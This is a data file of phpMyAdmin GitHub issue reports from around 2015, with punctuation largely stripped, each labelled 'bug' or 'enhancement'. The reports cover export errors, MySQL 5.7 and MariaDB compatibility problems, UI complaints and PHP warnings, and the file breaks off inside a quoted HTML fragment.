[issue] https cloud.githubusercontent.com assets 13976302 9486970 275b603a 4c00 11e5 9c15 ebc7a21fe383.png)","bug"
"24444","11431","No row selected .
Seen in QA 4 4.
Browse a table, tick a row, With selected > Delete, then confirm No row selected .
Introduced with 72afd81c439dc2dc2e0b68aa93ff88f8e6aa9ba1","bug"
"24444","11433","does not work as it is with sprintf.
` ` as hostname value while copying a new user and adding a new user does not work as it is with sprintf.
It may have to be escaped as ` `.
This creates a problem of empty query esp.
for create user stmt) while copying an user in version 4.5.0 beta1 on my local installation.
But I am not able to `copy an user` on demo.phpmyadmin.net and `creating new user` is working fine here.
Can anyone confirm if this problem exists ?
or is this problem just with my local machine only ?","bug"
"24444","11434","Class SqlParser\Lexer not found.
QA 4 5, After a failed login .","bug"
"24444","11435","[RFC] Add docker support for phpmyadmin.
I would like to contribute phpmyadmin , to add docker support for phpmyadmin.
I create a repo contains Dockerfile quick running phpmyadmin as a docker container , Here is the repo address https github.com netroby alpine phpmyadmin The official docker images will be https hub.docker.com r netroby alpine phpmyadmin Update 2015 11 25, using alpine to decrease docker image size, now only 24MB or less","enhancement"
"24444","11436","CREATE DATABASE should be enabled by default on server exports.
Since 77e67c3f2cb1e7cda9255128b779335bd9af80ff, `CREATE DATABASE` statements are missing by default from exports.
I think this is very confusing, notably when exporting multiple databases as the dump file is unusable as is when importing on a new server.
The configuration option was asked in [SourceForge 4019] http sourceforge.net p phpmyadmin bugs 4019 ), but it probably shouldn t have been set to disabled by default.
Note the OP s use case isn t quite standard, as their customers are exporting data then importing to a differently named database, this should usually be done in the database panels, not in the server panel.","bug"
"24444","11438","Support JSON data type.
See https dev.mysql.com doc refman 5.7 en json.html","enhancement"
"24444","11442","MySQL 5.7 and SHOW VARIABLES.
A new behavior in MySQL 5.7 might cause some problems.
Indeed, it seems like many all?)
SHOW VARIABLES statements are disabled by default for unprivileged users, unless show compatibility 56 is set to ON.
Tested on MySQL 5.7.8.
See http dev.mysql.com doc refman 5.7 en server system variables.html sysvar show compatibility 56 show","bug"
"24444","11445","MySQL 5.7 and Status page for an unprivileged user.
Since most of the `SHOW` commands are not allowed for unprivileged user, sub pages of the Status page is mostly broken.
Status > Server it totally broken Status > Processes is OK Status > Query statistics is totally broken Status > All status variables is totally broken Status > Monitor Questions and Traffic charts are broken Status > Advisor Huge number of warnings.
I m not sure about the accuracy of the suggestion due to these.","bug"
"24444","11446","MySQL 5.7 and Variables page for an unprivileged user.
In QA 4 5, as tested with MySQL 5.7.8, the Variables page is empty for an unprivileged user under the same conditions as 11442.","bug"
"24444","11447","MySQL 5.5 and the language system variable.
As tested in MySQL 5.5.43, the language system variable no longer exists.","bug"
"24444","11448","Documentation clarification about empty value cfg[ MemoryLimit ].
Hi, I think there should be more infos about the impacts of empty values of the MemoryLimit configuration setting in the official documentation in http docs.phpmyadmin.net en latest config.html cfg MemoryLimit When doing exports and imports only if the config value is not empty the ini set call will be made as in https github.com phpmyadmin phpmyadmin blob dbb4dceeaac712dbabd93b8b51f44167ace973f5 export.php L301 and https github.com phpmyadmin phpmyadmin blob dbb4dceeaac712dbabd93b8b51f44167ace973f5 import.php L291 which is exactly what I needed because setting the memory limit is forbidden by default when using Suhosinxc2xb9 and results in spamming the syslog with messages like ALERT script tried to increase memory limit to 268435456 bytes which is above the allowed value .
So maybe something like If set to zero, the php.ini default value is used.
should be added there.
[1] https suhosin.org stories configuration.html suhosin memory limit","bug"
"24444","11450","Validation fails when using functions.
When adding a new row, fields cannot be filled using functions only.
<img width= 857 alt= bildschirmfoto 2015 08 31 um 20 38 17 src= https cloud.githubusercontent.com assets 6348321 9587014 7b71a8ae 5020 11e5 84f2 f7c68da68693.png >","bug"
"24444","11451","Designer Bug in move.js on multiple server configuration.
Missing server= parameter in following functions in js pmd move.js ) causes falling back to default server in db designer.php => phpmyadmin saves pma pdf pages to the wrong host default host) and loading of pages is impossible) function Edit pages ) var params = ajax request=true dialog=edit token= token db= db; => var params = ajax request=true dialog=edit token= token db= db server= server; function Delete pages ) var params = ajax request=true dialog=delete token= token db= db; => var params = ajax request=true dialog=delete token= token db= db server= server; function Save as ) var params = ajax request=true dialog=save as token= token db= db; => var params = ajax request=true dialog=save as token= token db= db server= server; function Export pages ) var params = ajax request=true dialog=export token= token db= db selected page= selected page; => var params = ajax request=true dialog=export token= token db= db server= server selected page= selected page; function Load page page) <a href= db designer.php?db= db token= token param page >< a> ) => <a href= db designer.php?db= db server= server token= token param page >< a> ) function Save3 callback) .append <input type= hidden name= db value= db > ) => .append <input type= hidden name= db value= db > ) .append <input type= hidden name= server value= server > ) AND THANKS for your GREAT WORK!
!","bug"
"24444","11452","Semantics of export and import icons are mixed up.
Hei there, there is one thing about the phpmyadmin interface that bothers me since forever.
IMO the semantics of the export and import icons are mixed up.
The export icon is showing an import action dataset is partly outside the table and the arrow is pointing on the table) whereas the import icon is showing an export action dataset is inside the table and the arrow is pointing outside of the table).
It would be correct if the icons would be the other way around, even though the color coding is appropriate The red arrow of the import icon shows that you are importing and probably overwriting data while the green arrow of the export icon shows that this action is basically safe.
I sketched out my thoughts here https twitter.com b3zet status 638678090261131265 photo 1 The icons especially the export icons) still need some proper alignment though.
Any thoughts and comments are welcome.
Maybe I am missing valid arguments for the way the icons are designed.
Cheers!","bug"
"24444","11453","Paste command is gone in 4.4.
I upgraded to phpmyadmin 4.4.14, and am now unable to right click to a paste command in the Run SQL window.
The menu that I do get is the common browser right click menu, back, reload, save as...).
How else can I verify my PHP SQL statements?","bug"
"24444","11454","Find and replace is broken.
Found in QA 4 5 branch, finding matches in a column for replacing is broken.","bug"
"24444","11455","SSO Login causes warnings on session start ).
Hello PMA, I m using SSO Login to auto login my users to their PMA instances.
Problem, the second session start ) in files session.inc.php drops a warning session already started).
Should we fix session.inc.php or should I use a different code for SSO ?
Here is my code .
Thanks, Gaxc3xabtan","bug"
"24444","11456","Disabled storage engines.
As reported by Morgan Tocker on developer mailing list, The server now supports a list of disabled storage engines these still xe2x80x9cworkxe2x80x9d but no new tables can be created).
It might make sense to remove them from the drop down list or make them appear greyed out.
They also appear under xe2x80x9cENGINESxe2x80x9d the same as others currently.","enhancement"
"24444","11457","414 Request URI Too Large.
I get 414 error on js get scripts.js.php?scripts 5B 5D=jquery jquery 1.11.1.min.js scripts 5B 5D=sprintf.js scripts 5B 5D=ajax.js scripts 5B 5D=keyhandler.js scripts 5B 5D=jquery jquery ui 1.11.2.min.js scripts 5B 5D=jquery jquery.cookie.js scripts 5B 5D=jquery jquery.mousewheel.js scripts 5B 5D=jquery jquery.event.drag 2.2.js scripts 5B 5D=jquery jquery ui timepicker addon.js scripts 5B 5D=jquery jquery.ba hashchange 1.3.js scripts 5B 5D=jquery jquery.debounce 1.0.5.js scripts 5B 5D=menu resizer.js scripts 5B 5D=cross framing protection.js scripts 5B 5D=rte.js scripts 5B 5D=tracekit tracekit.js scripts 5B 5D=error report.js scripts 5B 5D=doclinks.js scripts 5B 5D=functions.js scripts 5B 5D=navigation.js scripts 5B 5D=indexes.js scripts 5B 5D=common.js scripts 5B 5D=codemirror lib codemirror.js scripts 5B 5D=codemirror mode sql sql.js scripts 5B 5D=codemirror addon runmode runmode.js scripts 5B 5D=codemirror addon hint show hint.js scripts 5B 5D=codemirror addon hint sql hint.js scripts 5B 5D=console.js scripts 5B 5D=config.js this seems stupid.
why would you use such a method to load scripts?
is there a way around this?
PS I tried chaning nginx config but seems like ` large client header buffers 8 512k;` is not enough","bug"
"24444","11458","Invalid UTF 8 sequence in argument.
See http stackoverflow.com questions 32349895 warning in libraries phpseclib crypt base php967","bug"
"24444","11461","Foreign key constraints for InnoDB tables with upper case letters disabled.
Hello, when a table name contains upper case letters PMA doesn t show the form to create foreign key constraints under Stucture > Relation View even if Engine = InnoDB.
It works fine when using lower case table names.
Example were foreign key constraints can be created form is shown) .
Example were foreign key constraints cannot be created form is hidden) .
The reason is that [`PMA Util isForeignKeySupported`] https github.com phpmyadmin phpmyadmin blob 8f0f0c5bbef0fbc6bcf0dfb1d4583ebf5d896002 libraries Util.class.php L3192) only shows the form if ` engine == INNODB `, but since the table name contains upper case letters, ` engine` is empty.
Table schematics are stored using a `mb strtolower`ed table name in `PMA DatabaseInterface table cache`.
This variable does contain the correct engine for both test cases.
To get the engine, `PMA Table getStatusInfo` gets invoked, but uses the original table name for the cache lookup, which fails, since the table schematics are stored lower cased.
A quick fix that worked for me was to add `mb strtolower` in [`PMA Table getStatusInfo`] https github.com phpmyadmin phpmyadmin blob 8f0f0c5bbef0fbc6bcf0dfb1d4583ebf5d896002 libraries Table.class.php L309) .
This shouldn t cause problems since on the system that has this problem you can t create tables which only differ in case i.e.
`Test` and `test` cannot both exist in the same database.
Possibly related to http sourceforge.net p phpmyadmin bugs 2036 Related stackoverflow question http stackoverflow.com q 25616281 1220835 System confirmed on OS X 10.9 and 10.10.
Apache 2.4.10 PHP 5.5.21 MySQL 5.6.22 PMA confirmed on 4.3.9 and 4.5.0 beta1 most current) lower case file system = ON default) lower case table names = 2 default for OS X meaning tables get stored using their original names, but are compared case insensitively)","bug"
"24444","11462","PHP gettext warnings related to PHP 7.
Using phpMyAdmin 4.4.14 from Fedora) with PHP 7.0.0 RC1 the login page already throws this Deprecation Notice in .
.. php gettext streams.php 48 Methods with the same name as their class will not be constructors in a future version of PHP; StringReader has a deprecated constructor Backtrace .
.. php gettext gettext.inc 41 require ) .
libraries select lang.lib.php 477 require once .
.. php gettext gettext.inc) .
libraries common.inc.php 563 require .
libraries select lang.lib.php) .
index.php 12 require once .
libraries common.inc.php) Note that PHP gettext is unbundled at Fedora, however I was not able to see that the bundled PHP gettext in phpMyAdmin would contain a fix for that.
If I am wrong, please let me know and I am happy to backport a fix to Fedora EPEL packages).","bug"
"24444","11463","Cannot redeclare class phpseclib\Crypt\AES in 4.5.0.
Hello!
Thanks for phpMyAdmin!
I ve just installed phpMyAdmin 4.5.0 beta2 and got an error at the index page Fatal error Cannot redeclare class phpseclib\Crypt\AES in ROOT\phpMyAdmin\libraries\phpseclib\Crypt\AES.php on line 128 .
I ve disabled all extensions except mbstring and mysqli but it doesn t help.
phpMyAdmin 4.4.14 works fine.
Apache 2.4.16 PHP 5.6.11 Windows 8.1","bug"
"24444","11464","phpMyAdmin suggests upgrading to newer version not usable on that system.
phpMyAdmin suggests by default upgrading to a newer version which is not usable on that system.
Example phpMyAdmin 4.0.10.10 is the latest stable version that can be run on RHEL CentOS 6, because it ships PHP 5.3.3 and MySQL 5.1.73.
However > Version information 4.0.10.10, latest stable version 4.4.14 and > A newer version of phpMyAdmin is available and you should consider upgrading.
The newest version is 4.4.14, released on 2015 08 20.
I am aware that these checks can be disabled, but shouldn t these checks also pay attention to the versions they depend on?
From my point of view the version checks should be maybe per branch release series 4.0.x) if a newer version 4.4.x) would not run with the versions a server provides.","bug"
"24444","11465","Using shell exec for very large sql files.
I was trying to upload a large sql file using phpMyAdmin but there were many errors.
When i switched to terminal to execute it then in my surprise there was no error.
So can we add an option in phpMyAdmin to evoke a shell exec command for import.
[See link on stackoverflow] http stackoverflow.com questions 4027769 running mysql sql files in php)","bug"
"24444","11466","Move Console handle to the bottom right side of the screen.
Console handle is currently placed at the bottom left side of the main screen area.
This way it overrides useful information and is inconvenient.
Please move Console handle to the bottom right side of the screen.","enhancement"
"24444","11468","TypeError.
record.params is undefined This report is related to user submitted report [ 88] http localhost 8080 error reporting server reports view 88) on the phpmyadmin error reporting server.","bug"
"24444","11469","Latest stable release permanent download link.
Hi.
After switching to self hosted platform I cannot find universal download link for the latest release.
I created a script for automated phpMyAdmin updates that used latest link to sourceforge.
How about creating a phpMyAdmin latest all languages.zip .tar.gz ... links?","bug"
"24444","11470","Impossible to cancel Drop files here overlay.
I had a tab open on a phpMyAdmin page which might be a tables list or a query results) with Firefox.
Then I switched to a Windows Explorer window and started dragging a file to another program on another screen.
While doing that, the file being dragged happened to pass over the phpMyAdmin window in Firefox, and a message Drop files here appeared in that window.
At that point, it became impossible to resume control of the phpMyAdmin Firefox window the Esc key wouldn t work and nothing in the UI allowed me to cancel the overlay.
I could either close the tab or reload the whole page.
Reproduce always Simplest reproduce case Open the PMA homepage installed webapp, not the project homepage) with Firefox and start dragging a file from Windows Explorer passing over the PMA window.
An overlay then blocks the whole PMA page with a Select database first message.
Versions Windows 7 x64 phpMyAdmin 4.4.14.1 Firefox Developer Edition 42.0a2 This issue doesn t affect Chrome 47.0.2505.0 canary 64 bit)","bug"
"24444","11472","Tiny translation issue in french.
version 4.5.0 rc1.
Hi.
Just a tiny translation issue for french, with version 4.5.0.rc1 Click on a base, than structure tab.Below the tables, there is the general dropdown menu.
The maintenance optgroup shows <b> and < b> html tags within the menu.
It should be easy to fix ) !
[bug] https cloud.githubusercontent.com assets 3285335 9801626 80843e64 5814 11e5 8343 ea027148e93c.jpg)","bug"
"24444","11473","TypeError.
Cannot read property token of undefined This report is related to user submitted report [ 37] http localhost 8080 error reporting server reports view 37) on the phpmyadmin error reporting server.","bug"
"24444","11474","TypeError.
Unable to get value of the property token object is null or undefined This report is related to user submitted report [ 272] http localhost 8080 error reporting server reports view 272) on the phpmyadmin error reporting server.","bug"
"24444","11475","Warnings linked to Drizzle.
I ve a lot of warnings on Advisor page Index > Status > Advisor) related to Drizzle .
Maybe linked to https github.com phpmyadmin phpmyadmin pull 11460 ?","bug"
"24444","11476","Errors instead of git info when PHP has no gzip support.
When PHP is compiled without gzip support, I get this instead of the git revision information <pre> Fatal error Uncaught Error Call to undefined function gzuncompress ) in var www pma dev fork libraries Config.class.php 510 Stack trace 0 var www pma dev fork libraries display git revision.lib.php 26) PMA Config >checkGitRevision ) 1 var www pma dev fork index.php 92) PMA printGitRevision ) 2 {main} thrown in var www pma dev fork libraries Config.class.php on line 510 < pre>","bug"
"24444","11477","Automate localized documentation updates.
Currently the [localized documentation repository] https github.com phpmyadmin localized docs) is synced with development one manually.
This makes propagating of the changes quite slow, what can cause confusion, especially when fixing typos in the documentation.
This process could be automated Add GitHub hook for phpmyadmin repository Detect changes in the doc folder in the master branch Commit all pending translations in Weblate Update the localized docs repository to match phpmyadmin one","enhancement"
"24444","11478","Undefined index rules.
Undefined index rules, 44 incidents of this bug This seems to happen quite often...
This report is related to user submitted report [ 14325] https reports.phpmyadmin.net reports view 14325) on the phpmyadmin error reporting server.","bug"
"24444","11479","Allow setting routine wise privileges.
MySQL allows setting routine wise privileges.
However, this is not supported in out current UI.","enhancement"
"24444","11480","Notice Undefined index drop database.
Undefined index drop database This report is related to user submitted report [ 14451] https reports.phpmyadmin.net reports view 14451) on the phpmyadmin error reporting server.","bug"
"24444","11482","Can t get access to rows of tables with no primary key.
Hi, When I tried to delete rows from a table with no primary key specified, I had no other choice than using direct sql query.
Even I can t update table data.
There has to be a UI type solution for this.
Or there should be a system which will restrict users to not create tables with primary key unspecified.
Please correct me if I m skipping anything that might already be there as a solution to this problem that I don t know about.
Thanks Best Regards, Tanjil","bug"
"24444","11484","Foreign keys not working with ANSI QUOTES.
I have a mysql database server but my code needs to be as compatible as possible with SQL Server, so I have sql mode = ANSI QUOTES in the mysql config.
This seems to cause foreign keys to not be displayed or enforced properly in phpMyAdmin.","bug"
"24444","11486","Server variable edition in ANSI QUOTES sql mode losing current value.
When server is running in ANSI QUOTES sql mode, as seen in QA 4 5, in Server > Variables when I click on Edit for a variable I don t see its current value.","bug"
"24444","11487","Warning when entering Query page.
Warning in .\libraries\DBQbe.class.php 331 Invalid argument supplied for foreach ) Backtrace .\libraries\DBQbe.class.php 240 PMA DbQbe > setCriteriaTablesAndColumns ) .\db qbe.php 109 PMA DbQbe > construct string my string , array, object, ) How can I fix this?","bug"
"24444","11489","Cannot copy a database under certain conditions.
As seen in 4.4.14.1, a database having a table whose name contains an accented character and whose primary key is on a column whose name also contains an accented character, cannot be copied via Database > Operations.","bug"
"24444","11490","UI for defining partitioning in create table window.
Even though phpMyAdmin 4.5 has improved support for partitioning, it is still limited to viewing information on partitions and performing various operations on partitions.
There is only a text field in create table window to specify partitioning criteria and it does not guide the user in anyway.
Instead, phpMyAdmin should have an interface where the user can specify the following with regards to partitioning.
1. partitioning algorithm and its expression or column list 2. number of partitions 3. sub partitioning algorithm and its expression or column list 4. number of sub partitions For each partition and sub partition 1. values included in it 2. storage engine 3. comment etc.","enhancement"
"24444","11491","Propose table structure broken.
This feature is broken in beta release of phpMyAdmin version 4.5","bug"
"24444","11492","AUTO INCREMENT statements are partly missing from exports.
Hi, I noticed that in 4.5.0 there seem to be bugs in the export.
We have a Joomla!
database which was missing 50 of the statements that add an AUTO INCREMENT to a column.
I was able to reproduce this easily with a simplified table on the demo server .
results in an export that is missing the last ALTER TABLE part regarding the AUTO INCREMENT.
I double checked that adding the AUTO INCREMENT was checked on the export page and that it really showed up on the structure page.","bug"
"24444","11495","PMA Microhistory is undefined.
PMA Microhistory is undefined This report is related to user submitted report [ 14878] https reports.phpmyadmin.net reports view 14878) on the phpmyadmin error reporting server.","bug"
"24444","11496","Incorrect definition for getTablesWhenOpen ).
Non static method PMA Util getTablesWhenOpen ) should not be called statically This report is related to user submitted report [ 14868] https reports.phpmyadmin.net reports view 14868) on the phpmyadmin error reporting server.","bug"
"24444","11497","Incorrect indexes when exporting.
Table indexes are broken when exporting.
Example SQL to create the table DROP TABLE IF EXISTS `jos core acl aro`; CREATE TABLE IF NOT EXISTS `jos core acl aro` `id` int 11) NOT NULL, `section value` varchar 240) NOT NULL DEFAULT 0 , `value` varchar 240) NOT NULL DEFAULT , `order value` int 11) NOT NULL DEFAULT 0 , `name` varchar 255) NOT NULL DEFAULT , `hidden` int 11) NOT NULL DEFAULT 0 ) ENGINE=InnoDB DEFAULT CHARSET=latin1; INSERT INTO `jos core acl aro` `id`, `section value`, `value`, `order value`, `name`, `hidden`) VALUES 10, users , 62 , 0, Administrator , 0), 23, users , 75 , 0, Test , 0), 24, users , 76 , 0, Test 2 , 0), 25, users , 77 , 0, Test 3 , 0), 26, users , 78 , 0, Test 4 , 0); ALTER TABLE `jos core acl aro` ADD PRIMARY KEY `id`), ADD UNIQUE KEY `jos section value value aro` `section value` 100),`value` 100)) USING BTREE, ADD KEY `jos gacl hidden aro` `hidden`); Now export that table in PMA 4.5.0.1.
The index section comes out like this ALTER TABLE `jos core acl aro` ADD PRIMARY KEY `id`), ADD UNIQUE KEY `jos section value value aro` `section value`); Works fine on PMA 4.4.9.","bug"
"24444","11500","Error when creating new user on MariaDB 10.0.21.
Hello, When trying to create a new user User accounts > Add user account) I get the following errors .
and then .
Running the following query generated my phpmyadmin .
gets the following error .
If I remove WITH mysql native password from the query, they query is executed fine.
Versions CentOS release 6.7 Final) Apache Apache 2.2.15 PHP PHP 5.5.29 PHP extension mysqli Database 10.0.21 MariaDB log MariaDB Server Database client version libmysql","bug"
"24444","11502","Table listed in Structure pane but not in Navigation pane.
See the food des table in the attached screenshot it is listed in the Structure pane but not the Navigation pane.
!
[image] https cloud.githubusercontent.com assets 4616031 10107229 93510cf6 636e 11e5 98e7 2828f2888a3d.png)","bug"
"24444","11503","Port 443 Redirects to 34543 on Yosemite Server 5.
When I attempt to log into phpMyAdmin the page is redirected to port 34543.
This is due to a change in the way that Mac OS X Yosemite Server 5.03 4 are setting up web sites.
If I go to my login page for phpMyAdmin, https munkireport.example.com phpmyadmin ) the page loads just fine.
If I click on the documentation Question Mark button that page will load correctly https munkireport.example.com phpmyadmin doc html index.html).
However, if I attempt to log in from the main page it then attempts to open the following page on the wrong port, https munkireport.example.com 34543 phpmyadmin index.php?token=b300 e) with the error message Safari can t open the page https munkireport.example.com 34543 phpmyadmin index.php?token=b300 e because Safari can t connect to the server munkireport.example.com .
If I remove the erroneous port number 34543 from the URL I can then get to the Overview page for phpMyAdmin and moving from page to page works after that.
This is also keeping me from setting up a new configuration server for mySQL.
I can create the config file but when moving it to the root phpMyAdmin folder I am then not able to login as the error message returned is Cannot log in to the MySQL server","bug"
"24444","11504","Reactivate cut paste possibility in print view.
The previous print view in phpmyadmin was useful to copy and paste tables into other documents, email, etc.
The new print view in 4.5 makes that impossible because it works completely differently and does not show on the screen and javascript is used to trigger automatic print dialog in browsers.
You need to put an option back into config to disable the automatic print dialog javascript and to just display it on screen so it can be shown in another tab, etc.)","bug"
"24444","11505","Notice on htmlspecialchars ).
htmlspecialchars ) expects parameter 1 to be string, array given This report is related to user submitted report [ 15042] https reports.phpmyadmin.net reports view 15042) on the phpmyadmin error reporting server.","bug"
"24444","11506","How to set Full Texts display permanently as default in phpMyAdmin 4?.
As can be seen in the source code https github.com phpmyadmin phpmyadmin tree master libraries ) in PhpMyAdmin 4. , phpmyadmin libraries display tbl.lib.php no longer exists.
So, it not possible to do REQUEST[ display text ] = F the way it is described here http stackoverflow.com a 17838640 If I change it through Settings > Main Panel > Browse Mode Limit column characters the settings are only stored for the session, but I want it to be stored permanently.
How to set full text as default now?","bug"
"24444","11507","optimize space.
threre s a lot of space wasted, it could take halt of space see image !
[myadmin] https cloud.githubusercontent.com assets 14863835 10125237 d5c7f13a 656c 11e5 9f22 c9c78622b0da.png)","enhancement"
"24444","11508","Packagist version.
There is no version that respects the packagist version guidelines, so if I try to use phpmyadmin as composer dependency require) I get a composer error there are no `dev STABLE` versions).
Library that uses phpmyadmin as dependency https github.com thecsea twofactor phpmyadmin","enhancement"
"24444","11509","error exporting sql query results with table alias.
I see SQL errors when trying to export results of SQL query.
While exporting a query with table alias, alias goes missing.
In example i use database mysql, but this is not specific to this database or table.
How to reproduce Select database mysql, SQL tab, enter query .
select export from same page under query results.
Now choose any format, with YAML for example i see such error <div class= error ><h1>Error< h1><p><strong>SQL query < strong> <a href= .
url.php?url=http 3A 2F 2Fdev.mysql.com 2Fdoc 2Frefman 2F5.7 2Fen 2Fselect.html target= mysql doc ><img src= themes dot.gif title= Documentation alt= Documentation class= icon ic b help >< a><a href= tbl sql.php?sql query=SELECT 60user 60 2C 60host 60 FROM 60mysql 60.
60user 60 where a.host like 27 25 27 amp;show query=1 amp;db=mysql amp;table=user amp;token=012c772933cd36fe1a1a271028e5ab90 ><span class= nowrap ><img src= themes dot.gif title= Edit alt= Edit class= icon ic b edit > nbsp;Edit< span>< a> < p> <p> <code class= sql ><pre> SELECT `user`, `host` FROM `mysql`.`user` where a.host like < pre>< code> < p> <p> <strong>MySQL said < strong><a href= .
url.php?url=http 3A 2F 2Fdev.mysql.com 2Fdoc 2Frefman 2F5.7 2Fen 2Ferror messages server.html target= mysql doc ><img src= themes dot.gif title= Documentation alt= Documentation class= icon ic b help >< a> < p> <code> 1054 Unknown column a.host in where clause < code><br >< div> Versions affected 4.6, 4.5.0.2","bug"
"24444","11510","AUTO INCREMENT always exported when IF NOT EXISTS is on.
While exporting, if the `IF NOT EXISTS` option is on, the `AUTO INCREMENT value` option does not have any effect.
The AUTO INCREMENT value is always exported in CREATE TABLE statement.","bug"
"24444","11512","SQL editing window does not recognise OUTER keyword in LEFT OUTER JOIN .
In the SQL editing window, if you enter a query containing LEFT OUTER JOIN , the word OUTER is underlined in red, and a red X appears on the left with error Unrecognised keyword.
near OUTER) .
https dev.mysql.com doc refman 5.7 en join.html shows that OUTER is a valid optional keyword.","bug"
"24444","11514","Unable to import database exported with phpmyadmin.
So, I exported my entire databases into a single file which phpmyadmin allows), so after a while when I tried to import, I get an error saying that the import can only be made under a specific database.
Meaning, I would have to choose a database first, then import.
Which I can t do, because the exported file contains all the data for all the databases.
Is there any way to get around this problem?
Why did you enable all databases to be exported in one file, if they can not be imported back again?","bug"
"24444","11515","Multi source replication is not recognized.
Hello, I am using the latest pma 4.5.0.2 with MariaDB 10.1.7 and multi source replication https mariadb.com kb en mariadb multi source replication ).
In this case the server is not recognized as part of a replication setup under status .
I have to use the query SHOW ALL SLAVES STATUS to see the different masters that replicate to the server.
Best regards Michael","enhancement"
"24444","11516","Some partitions are missing in copied table.
Seen on version 4.5 Create the table with .
And try to make a copy of it in table operations page.
Some partitions are missing in the copied table","bug"
"24444","11518","NOT IN clause not recognized MySQL 5.6 and 5.7).
See http stackoverflow.com questions 32792381 mysql not in clause not recognized in phpmyadmin 4 5 0 2","bug"
"24444","11519","Bug while exporting results when a joined table field name is in SELECT query.
Using mysql database, if I run SELECT FROM help topic INNER JOIN help category ON help topic.help category id = help category.help category id; I can see the results.
Then, exporting with Query results operations | Export , Export method Custom | Format Open Document Spreadsheet | Replace NULL with NULL | Put columns names in the first row, phpmyadmin generates a correct file.
If I specify a field name from a joined table, like in this query SELECT help topic.name, help category.name FROM help topic INNER JOIN help category ON help topic.help category id = help category.help category id; I can see the results but the generated .ods file contains only the following error message Error SQL query Edit SELECT help topic.name, help category.name FROM help topic MySQL said 1054 Unknown column help category.name in field list My configuration Database server Server 127.0.0.1 via TCP IP) Server type MySQL Server version 5.6.23 MySQL Community Server GPL) Protocol version 10 User localhost Server charset UTF 8 Unicode utf8) Web server Apache 2.4.16 Unix) PHP 5.5.27 OpenSSL 0.9.8zg Database client version libmysql mysqlnd 5.0.11 dev 20120503 Id PHP extension mysqli Documentation PHP version 5.5.27 phpMyAdmin Version information 4.5.0.2 up to date) Git revision 8974d4b from STABLE branch, committed on Sep 25, 2015 at 07 57 PM by Marc Delisle","bug"
"24444","11520","Incorrect syntax creating an user using mysql native password with MariaDB.
According to MariaDB docs https mariadb.com kb en mariadb development pluggable authentication ), the correct syntax to create an user with mysql native password plugin is .
And today phpMyAdmin 4.5.0.2 is using this syntax .
This is generating errors 1065 Query was empty error above the printed query and The selected user was not found in the privilege table.
right on top of the user creation wizard.
I was able to create the user directly in SQL Query with the syntax pointed at MariaDB docs.
got password hash using `select PASSWORD test );`).
Versions phpMyAdmin 4.5.0.2 MariaDB 10.0.20 MariaDB","bug"
"24444","11521","Notice of undefined variable when performing SHOW CREATE TABLE.
Seen on 4.5, when choosing one or more table in database structure page and selecting `Show create` from `With selected`.","bug"
"24444","11522","Strange behavior on table rename.
So, by accident I renamed a table a from chemicals copy two to chemicalsCopy2 and an issue with phpmyadmin 4.4.14 ) not being able to read the config of the table arose.
As far as I can tell this is a PMA issue as the name is valid based on MySQL guidelines.
I don t know what the issue is... See https youtu.be neeYqlh6TU","bug"
"24444","11524","Yellow star does not change in database Structure after add remove from favorites.","bug"
"24444","11526","Foreign key to other database s tables fails.
Hi!
When I specify a relation to a table that resides in a different database, phpmyadmin fails.
All my tables are innodb and it used to work on the previous version I was using.
Problem version is 4.5.0.2, released on 2015 09 25.
Version that is working for me is 4.4.4 Other data Database server Server 127.0.0.1 via TCP IP Server type MySQL Server version 5.5.34 log MySQL Community Server GPL) Protocol version 10 User root localhost Server charset UTF 8 Unicode utf8) Web server Microsoft IIS 8.0 Database client version libmysql mysqlnd 5.0.11 dev 20120503 Id bf9ad53b11c9a57efdb1057292d73b928b8c5c77 PHP extension mysqli Documentation PHP version 5.5.11 phpMyAdmin Version information 4.4.4, latest stable version 4.5.0.2","bug"
"24444","11528","PHP Fatal error Class SqlParser\\Lexer not found.
On master, with a configuration using cookie auth and multiple servers in 1 installation, we are receiving a PHP error of PHP Fatal error Class SqlParser\\Lexer not found in libraries Util.class.php on line 634 This only occurs on some of our servers, not all of them, when logging in.","bug"
"24444","11531","Invalid SQL in table definition when exporting table.
Steps to reproduce 1.
Create a table with 1. an `id` field of type INT as primary key, 2. and another field of type ENUM, where the enumeration contains an equal sign as a possible value that is selected by default.
2.
Export the table.
The expected result and the result the latest release gives can be found in the attached file.
The expected result was produced by version 4.0.10; the invalid SQL was generated by the latest release 4.5.0.2).
Server Ubuntu 14.04) runs Apache 2.4.7 with PHP 5.5.9.","bug"
"24444","11535","Export database.
Version information 3.4.10.1deb1 I see I have got an update on phpMyAdmin.
I did an export of my database.
But get some HTML code in the end of the exported sql file.
The HTML is related to phpMyAdmin, so doesn t seems to be from my tables <!DOCTYPE html PUBLIC W3C DTD XHTML 1.0 Transitional EN http www.w3.org TR xhtml1 DTD xhtml1 transitional.dtd > <html xmlns= http www.w3.org 1999 xhtml xml lang= en lang= en dir= ltr > <head> <meta http equiv= Content Type content= text html; charset=utf 8 > <link rel= icon href= .
favicon.ico type= image x icon > <link rel= shortcut icon href= .
favicon.ico type= image x icon > <title>phpMyAdmin< title> <link rel= stylesheet type= text css href= phpmyadmin.css.php?server=1 amp;token=f23bb1ee777079e38fa190ae832d1ee0 amp;js frame=right amp;nocache=5519561864 > <link rel= stylesheet type= text css href= print.css media= print > <link rel= stylesheet type= text css href= .
themes pmahomme jquery jquery ui 1.8.custom.css > <meta name= robots content= noindex,nofollow > <script src= .
js cross framing protection.js?ts=1329568005 type= text javascript >< script> <script src= .
js jquery jquery 1.4.4.js?ts=1329568005 type= text javascript >< script> <script src= .
js update location.js?ts=1329568005 type= text javascript >< script> <script src= .
js functions.js?ts=1329568005 type= text javascript >< script> <script src= .
js jquery jquery.qtip 1.0.0.min.js?ts=1329568005 type= text javascript >< script> <script src= .
js messages.php?lang=en amp;db=122370 smartmarketsrilanka amp;token=f23bb1ee777079e38fa190ae832d1ee0 type= text javascript >< script> <script type= text javascript > <!
[CDATA[ Updates the title of the frameset if possible ns4 does not allow this) if typeof parent.document) != undefined typeof parent.document) != unknown typeof parent.document.title) == string ) { parent.document.title = smartmarketsrilanka 122370.phpmyadmin.mysql.binero.se 10.209.1.123 122370 smartmarketsrilanka tblproductsubcattextfieldvaule | phpMyAdmin 3.4.10.1deb1 ; } ]]> < script> <meta name= OBGZip content= true > <!
[if IE 6]> <style type= text css > <!
[CDATA[ html { overflow y scroll; } ]]> < style> <!
[endif] > < head> <body> <div id= serverinfo > <a href= main.php?token=f23bb1ee777079e38fa190ae832d1ee0 class= item > <img class= icon src= .
